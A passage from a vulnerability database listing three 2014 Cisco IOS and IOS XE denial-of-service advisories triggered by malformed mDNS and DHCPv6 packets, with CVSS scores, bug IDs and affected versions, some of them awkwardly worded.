This issue is being tracked by Cisco Bug ID CSCue22753. The following products and versions are affected: Cisco IOS Releases 15.1 through 15.3, IOS XE 3.3.xXO prior to 3.3.1XO, 3.6.xS and 3.7.xS prior to 3.7.6S, 3.8.xS and 3.9 prior to 3.10.1S .xS version, 3.10S version
| VAR-201409-0407 | CVE-2014-3357 | Cisco IOS and IOS XE Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS 15.0, 15.1, 15.2, and 15.4 and IOS XE 3.3.xSE before 3.3.2SE, 3.3.xXO before 3.3.1XO, 3.5.xE before 3.5.2E, and 3.11.xS before 3.11.1S allow remote attackers to cause a denial of service (device reload) via malformed mDNS packets, aka Bug ID CSCul90866. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCul90866. The following products and versions are affected: Cisco IOS Releases 15.0, 15.1, 15.2, and 15.4, IOS XE 3.3.xSE prior to 3.3.2SE, 3.3.xXO prior to 3.3.1XO, 3.5.xE prior to 3.5.2E and Version 3.11.0S
| VAR-201409-0408 | CVE-2014-3358 | Cisco IOS and IOS XE Software Multicast DNS Gateway Memory Leak Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in Cisco IOS 15.0, 15.1, 15.2, and 15.4 and IOS XE 3.3.xSE before 3.3.2SE, 3.3.xXO before 3.3.1XO, 3.5.xE before 3.5.2E, and 3.11.xS before 3.11.1S allows remote attackers to cause a denial of service (memory consumption, and interface queue wedge or device reload) via malformed mDNS packets, aka Bug ID CSCuj58950. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. Cisco IOS and IOS XE software are prone to a remote denial-of-service vulnerability.
This issue is being tracked by Cisco Bug ID CSCuj58950. The following products and versions are affected: Cisco IOS Releases 15.0, 15.1, 15.2, and 15.4, IOS XE 3.3.xSE prior to 3.3.2SE, 3.3.xXO prior to 3.3.1XO, 3.5.xE prior to 3.5.2E and Version 3.11.0S
| VAR-201409-0409 | CVE-2014-3359 | Cisco IOS and IOS XE Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in Cisco IOS 15.1 through 15.4 and IOS XE 3.4.xS, 3.5.xS, 3.6.xS, and 3.7.xS before 3.7.6S; 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S; and 3.11.xS before 3.12S allows remote attackers to cause a denial of service (memory consumption or device reload) via malformed DHCPv6 packets, aka Bug ID CSCum90081. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCum90081. The following products and versions are affected: Cisco IOS Releases 15.1 through 15.4, IOS XE 3.7.6S prior to 3.4.xS, 3.5.xS, 3.6.xS and 3.7.xS, 3.10.1S prior to 3.8.xS, 3.9 .xS version and 3.10.xS version, 3.11.xS version before 3.12S